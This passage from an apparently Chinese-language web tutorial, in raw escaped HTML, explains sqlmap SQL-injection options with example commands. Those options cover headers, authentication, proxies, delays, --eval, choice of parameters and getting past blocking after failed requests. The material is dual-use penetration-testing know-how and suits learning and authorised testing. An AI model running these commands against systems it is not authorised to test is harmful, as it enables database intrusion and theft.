Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u53ef\u4ee5\u5728\u8bf7\u6c42\u4e2d\u4f2a\u9020<\/span><span>HTTP<\/span><span>\u4e2d\u7684<\/span><span>referer<\/span><span>\uff0c\u5f53<\/span><span>&#8211;level<\/span><span>\u53c2\u6570\u8bbe\u5b9a\u4e3a<\/span><span>3<\/span><span>\u6216\u8005<\/span><span>3<\/span><span>\u4ee5\u4e0a\u7684\u65f6\u5019\u4f1a\u5c1d\u8bd5\u5bf9<\/span><span>referer<\/span><span>\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%A2%9D%E5%A4%96%E7%9A%84HTTP%E5%A4%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u989d\u5916\u7684HTTP\u5934<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;headers<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u901a\u8fc7<span>&#8211;headers<\/span><span>\u53c2\u6570\u6765\u589e\u52a0\u989d\u5916\u7684<\/span><span>http<\/span><span>\u5934<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP%E8%AE%A4%E8%AF%81%E4%BF%9D%E6%8A%A4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP\u8ba4\u8bc1\u4fdd\u62a4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;auth-type,&#8211;auth-cred<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u4e9b\u53c2\u6570\u53ef\u4ee5\u7528\u6765\u767b\u9646<span>HTTP<\/span><span>\u7684\u8ba4\u8bc1\u4fdd\u62a4\u652f\u6301\u4e09\u79cd\u65b9\u5f0f\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">1<span>\u3001<\/span><span>Basic<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">2<span>\u3001<\/span><span>Digest<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">3<span>\u3001<\/span><span>NTLM<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/mysql\/basic\/get_int.php?id=1&#8221;&nbsp;&#8211;auth-type&nbsp;Basic&nbsp;&#8211;auth-cred&nbsp;&#8220;testuser:testpass&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP%E5%8D%8F%E8%AE%AE%E7%9A%84%E8%AF%81%E4%B9%A6%E8%AE%A4%E8%AF%81\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP\u534f\u8bae\u7684\u8bc1\u4e66\u8ba4\u8bc1<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;auth-cert<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>Web<\/span><span>\u670d\u52a1\u5668\u9700\u8981\u5ba2\u6237\u7aef\u8bc1\u4e66\u8fdb\u884c\u8eab\u4efd\u9a8c\u8bc1\u65f6\uff0c\u9700\u8981\u63d0\u4f9b\u4e24\u4e2a\u6587\u4ef6<\/span><span>:key_file<\/span><span>\uff0c<\/span><span>cert_file<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">key_file<span>\u662f\u683c\u5f0f\u4e3a<\/span><span>PEM<\/span><span>\u6587\u4ef6\uff0c\u5305\u542b\u7740\u4f60\u7684\u79c1\u94a5\uff0c<\/span><span>cert_file<\/span><span>\u662f\u683c\u5f0f\u4e3a<\/span><span>PEM<\/span><span>\u7684\u8fde\u63a5\u6587\u4ef6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTPS%E4%BB%A3%E7%90%86\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP(S)\u4ee3\u7406<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;proxy,&#8211;proxy-cred<\/span><span>\u548c<\/span><span>&#8211;ignore-proxy<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f7f\u7528<span>&#8211;proxy<\/span><span>\u4ee3\u7406\u662f\u683c\u5f0f\u4e3a\uff1a<\/span><span>http:\/\/url:port<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>HTTP(S)<\/span><span>\u4ee3\u7406\u9700\u8981\u8ba4\u8bc1\u662f\u53ef\u4ee5\u4f7f\u7528<\/span><span>&#8211;proxy-cred<\/span><span>\u53c2\u6570\uff1a<\/span><span>username:password<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">&#8211;ignore-proxy<span>\u62d2\u7edd\u4f7f\u7528\u672c\u5730\u5c40\u57df\u7f51\u7684<\/span><span>HTTP(S)<\/span><span>\u4ee3\u7406\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"HTTP%E8%AF%B7%E6%B1%82%E5%BB%B6%E8%BF%9F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">HTTP\u8bf7\u6c42\u5ef6\u8fdf<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;delay<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u8bbe\u5b9a\u4e24\u4e2a<span>HTTP(S)<\/span><span>\u8bf7\u6c42\u95f4\u7684\u5ef6\u8fdf\uff0c\u8bbe\u5b9a\u4e3a<\/span><span>0.5<\/span><span>\u7684\u65f6\u5019\u662f\u534a\u79d2\uff0c\u9ed8\u8ba4\u662f\u6ca1\u6709\u5ef6\u8fdf\u7684\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9A%E8%B6%85%E6%97%B6%E6%97%B6%E9%97%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9a\u8d85\u65f6\u65f6\u95f4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;timeout<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u8bbe\u5b9a\u4e00\u4e2a<span>HTTP(S)<\/span><span>\u8bf7\u6c42\u8d85\u8fc7\u591a\u4e45\u5224\u5b9a\u4e3a\u8d85\u65f6\uff0c<\/span><span>10.5<\/span><span>\u8868\u793a<\/span><span>10.5<\/span><span>\u79d2\uff0c\u9ed8\u8ba4\u662f<\/span><span>30<\/span><span>\u79d2\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9A%E9%87%8D%E8%AF%95%E8%B6%85%E6%97%B6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9a\u91cd\u8bd5\u8d85\u65f6<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;retries<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>HTTP(S)<\/span><span>\u8d85\u65f6\u65f6\uff0c\u53ef\u4ee5\u8bbe\u5b9a\u91cd\u65b0\u5c1d\u8bd5\u8fde\u63a5\u6b21\u6570\uff0c\u9ed8\u8ba4\u662f<\/span><span>3<\/span><span>\u6b21\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AE%BE%E5%AE%9A%E9%9A%8F%E6%9C%BA%E6%94%B9%E5%8F%98%E7%9A%84%E5%8F%82%E6%95%B0%E5%80%BC\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bbe\u5b9a\u968f\u673a\u6539\u53d8\u7684\u53c2\u6570\u503c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;randomize<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u8bbe\u5b9a\u67d0\u4e00\u4e2a\u53c2\u6570\u503c\u5728\u6bcf\u4e00\u6b21\u8bf7\u6c42\u4e2d\u968f\u673a\u7684\u53d8\u5316\uff0c\u957f\u5ea6\u548c\u7c7b\u578b\u4f1a\u4e0e\u63d0\u4f9b\u7684\u521d\u59cb\u503c\u4e00\u6837\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%A9%E7%94%A8%E6%AD%A3%E5%88%99%E8%BF%87%E6%BB%A4%E7%9B%AE%E6%A0%87%E7%BD%91%E5%9D%80\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5229\u7528\u6b63\u5219\u8fc7\u6ee4\u76ee\u6807\u7f51\u5740<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;scope<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-l&nbsp;burp.log&nbsp;&#8211;scope=&#8221;(www)?\\.target\\.(com|net|org)&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%81%BF%E5%85%8D%E8%BF%87%E5%A4%9A%E7%9A%84%E9%94%99%E8%AF%AF%E8%AF%B7%E6%B1%82%E8%A2%AB%E5%B1%8F%E8%94%BD\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u907f\u514d\u8fc7\u591a\u7684\u9519\u8bef\u8bf7\u6c42\u88ab\u5c4f\u853d<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;safe-url,&#8211;safe-freq<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6709\u7684<span>web<\/span><span>\u5e94\u7528\u7a0b\u5e8f\u4f1a\u5728\u4f60\u591a\u6b21\u8bbf\u95ee\u9519\u8bef\u7684\u8bf7\u6c42\u65f6\u5c4f\u853d\u6389\u4f60\u4ee5\u540e\u7684\u6240\u6709\u8bf7\u6c42\uff0c\u8fd9\u6837\u5728<\/span><span>sqlmap<\/span><span>\u8fdb\u884c\u63a2\u6d4b\u6216\u8005\u6ce8\u5165\u7684\u65f6\u5019\u53ef\u80fd\u9020\u6210\u9519\u8bef\u8bf7\u6c42\u800c\u89e6\u53d1\u8fd9\u4e2a\u7b56\u7565\uff0c\u5bfc\u81f4\u4ee5\u540e\u65e0\u6cd5\u8fdb\u884c\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u7ed5\u8fc7\u8fd9\u4e2a\u7b56\u7565\u6709\u4e24\u79cd\u65b9\u5f0f\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001<\/span><span>&#8211;safe-url<\/span><span>\uff1a\u63d0\u4f9b\u4e00\u4e2a\u5b89\u5168\u4e0d\u9519\u8bef\u7684\u8fde\u63a5\uff0c\u6bcf\u9694\u4e00\u6bb5\u65f6\u95f4\u90fd\u4f1a\u53bb\u8bbf\u95ee\u4e00\u4e0b\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001<\/span><span>&#8211;safe-freq<\/span><span>\uff1a\u63d0\u4f9b\u4e00\u4e2a\u5b89\u5168\u4e0d\u9519\u8bef\u7684\u8fde\u63a5\uff0c\u6bcf\u6b21\u6d4b\u8bd5\u8bf7\u6c42\u4e4b\u540e\u90fd\u4f1a\u518d\u8bbf\u95ee\u4e00\u8fb9\u5b89\u5168\u8fde\u63a5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%85%B3%E6%8E%89URL%E5%8F%82%E6%95%B0%E5%80%BC%E7%BC%96%E7%A0%81\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5173\u6389URL\u53c2\u6570\u503c\u7f16\u7801<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;skip-urlencode<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u6839\u636e\u53c2\u6570\u4f4d\u7f6e\uff0c\u4ed6\u7684\u503c\u9ed8\u8ba4\u5c06\u4f1a\u88ab<span>URL<\/span><span>\u7f16\u7801\uff0c\u4f46\u662f\u6709\u4e9b\u65f6\u5019\u540e\u7aef\u7684<\/span><span>web<\/span><span>\u670d\u52a1\u5668\u4e0d\u9075\u5b88<\/span><span>RFC<\/span><span>\u6807\u51c6\uff0c\u53ea\u63a5\u53d7\u4e0d\u7ecf\u8fc7<\/span><span>URL<\/span><span>\u7f16\u7801\u7684\u503c\uff0c\u8fd9\u65f6\u5019\u5c31\u9700\u8981\u7528<\/span><span>&#8211;skip-urlencode<\/span><span>\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%AF%8F%E6%AC%A1%E8%AF%B7%E6%B1%82%E6%97%B6%E5%80%99%E6%89%A7%E8%A1%8C%E8%87%AA%E5%AE%9A%E4%B9%89%E7%9A%84python%E4%BB%A3%E7%A0%81\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6bcf\u6b21\u8bf7\u6c42\u65f6\u5019\u6267\u884c\u81ea\u5b9a\u4e49\u7684python\u4ee3\u7801<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;eval<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728\u6709\u4e9b\u65f6\u5019\uff0c\u9700\u8981\u6839\u636e\u67d0\u4e2a\u53c2\u6570\u7684\u53d8\u5316\uff0c\u800c\u4fee\u6539\u53e6\u4e2a\u4e00\u53c2\u6570\uff0c\u624d\u80fd\u5f62\u6210\u6b63\u5e38\u7684\u8bf7\u6c42\uff0c\u8fd9\u65f6\u53ef\u4ee5\u7528<span>&#8211;eval<\/span><span>\u53c2\u6570\u5728\u6bcf\u6b21\u8bf7\u6c42\u65f6\u6839\u636e\u6240\u5199<\/span><span>python<\/span><span>\u4ee3\u7801\u505a\u5b8c\u4fee\u6539\u540e\u8bf7\u6c42\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/www.target.com\/vuln.php?id=1&amp;hash=c4ca4238a0b923820dcc509a6f75849b&#8221;&nbsp;&#8211;eval=&#8221;import&nbsp;hashlib;hash=hashlib.md5(id).hexdigest()&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e0a\u9762\u7684\u8bf7\u6c42\u5c31\u662f\u6bcf\u6b21\u8bf7\u6c42\u65f6\u6839\u636e<span>id<\/span><span>\u53c2\u6570\u503c\uff0c\u505a\u4e00\u6b21<\/span><span>md5<\/span><span>\u540e\u4f5c\u4e3a<\/span><span>hash<\/span><span>\u53c2\u6570\u7684\u503c\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E6%B3%A8%E5%85%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u6ce8\u5165<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E6%B5%8B%E8%AF%95%E5%8F%82%E6%95%B0\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u6d4b\u8bd5\u53c2\u6570<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-p,&#8211;skip<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u9ed8\u8ba4\u6d4b\u8bd5\u6240\u6709\u7684<\/span><span>GET<\/span><span>\u548c<\/span><span>POST<\/span><span>\u53c2\u6570\uff0c\u5f53<\/span><span>&#8211;level<\/span><span>\u7684\u503c\u5927\u4e8e\u7b49\u4e8e<\/span><span>2<\/span><span>\u7684\u65f6\u5019\u4e5f\u4f1a\u6d4b\u8bd5<\/span><span>HTTP&nbsp;Cookie<\/span><span>\u5934\u7684\u503c\uff0c\u5f53\u5927\u4e8e\u7b49\u4e8e<\/span><span>3<\/span><span>\u7684\u65f6\u5019\u4e5f\u4f1a\u6d4b\u8bd5<\/span><span>User-Agent<\/span><span>\u548c<\/span><span>HTTP&nbsp;Referer<\/span><span>\u5934\u7684\u503c\u3002\u4f46\u662f\u4f60\u53ef\u4ee5\u624b\u52a8\u7528<\/span><span>-p<\/span><span>\u53c2\u6570\u8bbe\u7f6e\u60f3\u8981\u6d4b\u8bd5\u7684\u53c2\u6570\u3002\u4f8b\u5982\uff1a&nbsp;<\/span><span>-p&nbsp;&#8220;id,user-anget&#8221;<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53\u4f60\u4f7f\u7528<span>&#8211;level<\/span><span>\u7684\u503c\u5f88\u5927\u4f46\u662f\u6709\u4e2a\u522b\u53c2\u6570\u4e0d\u60f3\u6d4b\u8bd5\u7684\u65f6\u5019\u53ef\u4ee5\u4f7f\u7528<\/span><span>&#8211;skip<\/span><span>\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<span>&#8211;skip=&#8221;user-angent.referer&#8221;<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5728\u6709\u4e9b\u65f6\u5019<span>web<\/span><span>\u670d\u52a1\u5668\u4f7f\u7528\u4e86<\/span><span>URL<\/span><span>\u91cd\u5199\uff0c\u5bfc\u81f4\u65e0\u6cd5\u76f4\u63a5\u4f7f\u7528<\/span><span>sqlmap<\/span><span>\u6d4b\u8bd5\u53c2\u6570\uff0c\u53ef\u4ee5\u5728\u60f3\u6d4b\u8bd5\u7684\u53c2\u6570\u540e\u9762\u52a0<\/span><span>*<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/targeturl\/param1\/value1*\/param2\/value2\/&#8221;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u5c06\u4f1a\u6d4b\u8bd5<\/span><span>value1<\/span><span>\u7684\u4f4d\u7f6e\u662f\u5426\u53ef\u6ce8\u5165\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE%E5%BA%93\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6307\u5b9a\u6570\u636e\u5e93<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;dbms<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u7cfb<span>sqlmap<\/span><span>\u4f1a\u81ea\u52a8\u7684\u63a2\u6d4b<\/span><span>web<\/span><span>\u5e94\u7528\u540e\u7aef\u7684\u6570\u636e\u5e93\u662f\u4ec0\u4e48\uff0c<\/span><span>sqlmap<\/span><span>\u652f\u6301\u7684\u6570\u636e\u5e93\u6709\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">MySQL<span>\u3001<\/span><span>Oracle<\/span><span>\u3001<\/span><span>PostgreSQL<\/span><span>\u3001<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u3001<\/span><span>Microsoft&nbsp;Access<\/span><span>\u3001<\/span><span>SQLite<\/span><span>\u3001<\/span><span>Firebird<\/span><span>\u3001<\/span><span>Sybase<\/span><span>\u3001<\/span><span>SAP&nbsp;MaxDB<\/span><span>\u3001<\/span><span>DB2<\/span><\/span><span 